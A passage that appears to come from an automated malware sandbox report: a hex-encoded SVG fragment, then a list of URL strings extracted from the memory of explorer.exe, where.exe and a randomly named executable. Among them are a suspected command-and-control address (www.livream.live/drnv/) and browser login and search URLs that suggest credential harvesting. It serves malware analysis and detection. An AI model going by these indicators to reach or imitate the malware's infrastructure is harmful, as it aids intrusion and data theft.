20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: explorer.exe, 00000010.00000002.2365243599.000000000BE19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2324903632.000000000BE19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: explorer.exe, 00000010.00000003.2324425355.000000000BEA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2323498712.000000000BEA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: explorer.exe, 00000010.00000002.2365243599.000000000BE19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2324903632.000000000BE19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: explorer.exe, 00000010.00000003.2265826832.00000000047E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.ad
                Source: explorer.exe, 00000010.00000002.2365243599.000000000BE19000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2324903632.000000000BE19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
                Source: ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2530150136.000000000570E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.livream.live
                Source: ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2530150136.000000000570E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.livream.live/drnv/
                Source: where.exe, 0000000A.00000003.1755354412.0000000007D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: explorer.exe, 0000001B.00000003.2421738803.0000000009BCE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532222982.0000000008211000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532222982.0000000008333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000020.00000002.2532222982.0000000008333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/:
                Source: explorer.exe, 00000020.00000002.2532222982.0000000008211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/B_F
                Source: explorer.exe, 00000020.00000002.2532222982.0000000008211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/b
                Source: explorer.exe, 00000020.00000002.2532222982.0000000008333000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2525034811.0000000000523000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000010.00000002.2362300597.00000000079E2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2419561951.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2421738803.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2425824427.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2467271837.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2427058556.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2417427782.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2420414728.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2418383505.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2422504576.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2532222982.0000000008211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2419561951.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2421738803.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2425824427.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2467271837.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2427058556.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2417427782.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2420414728.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2418383505.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2422504576.0000000009CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2534055059.0000000009E09000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2529797083.0000000004D32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 00000010.00000002.2362300597.00000000079C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?(
                Source: explorer.exe, 00000010.00000002.2365243599.000000000BDCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com%
                Source: explorer.exe, 00000020.00000002.2532222982.0000000008211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comC
                Source: explorer.exe, 0000001B.00000002.2453181998.00000000012B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comm
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                Source: where.exe, 0000000A.00000003.1755354412.0000000007D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.quer
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12PNdd
                Source: explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                Source: explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
                Source: explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv
                Source: explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark
                Source: where.exe, 0000000A.00000003.1755354412.0000000007D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: where.exe, 0000000A.00000003.1755354412.0000000007D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: explorer.exe, 00000010.00000003.2324425355.000000000BEA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2323498712.000000000BEA2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2368886940.000000000EE40000.00000004.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000002.2453532852.00000000015C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: where.exe, 0000000A.00000003.1755354412.0000000007D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: where.exe, 0000000A.00000003.1755354412.0000000007D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
                Source: where.exe, 0000000A.00000003.1755354412.0000000007D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: explorer.exe, 00000010.00000002.2365243599.000000000BDE7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2324903632.000000000BDE7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2425301044.0000000009CD6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2418879464.0000000009CEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2419561951.0000000009CEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2427058556.0000000009CD6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2421738803.0000000009CD6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2418383505.0000000009CD6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2422504576.0000000009CD6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2467271837.0000000009CD6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2417427782.0000000009CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: where.exe, 0000000A.00000003.1755354412.0000000007D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=parked
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.n
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11Sq3W.img
                Source: explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006EF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA9EkAf.img
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AALo3og.img
                Source: explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAywGC0.img
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
                Source: where.exe, 0000000A.00000002.2253277253.0000000000B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: where.exe, 0000000A.00000002.2253277253.0000000000B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: where.exe, 0000000A.00000003.1750655050.0000000007D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: where.exe, 0000000A.00000002.2253277253.0000000000B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: where.exe, 0000000A.00000002.2253277253.0000000000B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10331
                Source: where.exe, 0000000A.00000002.2253277253.0000000000B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: explorer.exe, 00000010.00000002.2365026789.000000000BBDE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2324086598.000000000BC1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                Source: explorer.exe, 0000001B.00000002.2467271837.0000000009AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.com6
                Source: explorer.exe, 0000001B.00000003.2417427782.0000000009D10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2418879464.0000000009D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000010.00000002.2359812979.000000000732A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2256707656.000000000734D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2364949409.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.2458110110.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2369629928.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2372826589.0000000007B9D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2465179034.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2469006349.0000000006F0A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2530452279.0000000006EF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000010.00000002.2365243599.000000000BDE7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2324903632.000000000BDE7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2425301044.0000000009CD6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2418879464.0000000009CEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2419561951.0000000009CEC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2427058556.0000000009CD6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2421738803.0000000009CD6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2418383505.0000000009CD6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2422504576.0000000009CD6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2417427782.0000000009CD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                Source: where.exe, 0000000A.00000003.1755354412.0000000007D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.0000000005788000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.0000000003988000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: where.exe, 0000000A.00000003.1755354412.0000000007D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked
                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=parked
                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=parked
                Source: where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=parked
                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=parked
                Source: where.exe, 0000000A.00000002.2257590860.0000000007AE0000.00000004.00000800.00020000.00000000.sdmp, where.exe, 0000000A.00000002.2255228897.00000000055F6000.00000004.10000000.00040000.00000000.sdmp, ICpHO9L5D6CxaaNC.exe, 0000000B.00000002.2528740443.00000000037F6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=parked
